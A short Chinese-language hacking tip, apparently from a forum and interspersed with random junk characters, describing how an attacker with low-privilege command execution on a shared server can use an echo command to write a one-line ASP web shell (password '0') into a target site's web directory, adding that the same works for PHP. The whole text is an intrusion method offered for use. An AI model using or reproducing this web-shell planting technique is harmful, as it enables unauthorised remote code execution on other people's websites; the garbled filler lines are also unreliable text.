在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。$ h: W, C. p2 p' D& F$ u0 S
+ ], _7 u; \" u" d& t2 Y
命令格式
. ~' ]# k0 |( ?5 u; D X' b, @1 }0 Z
Echo 语句 >目标站绝对目录9 y/ W7 I2 t, n3 D
- m- M6 E. c0 y" B! C5 m例如: & p N5 ?" |+ L% g
! b6 m$ S' ~) n9 F3 z+ J6 s
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
9 S# {6 D* u& Z0 Z, n1 J2 i& _2 [& ]2 ?% n+ q8 I. _) a
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。6 C0 L; X+ C1 D- S" y& h
|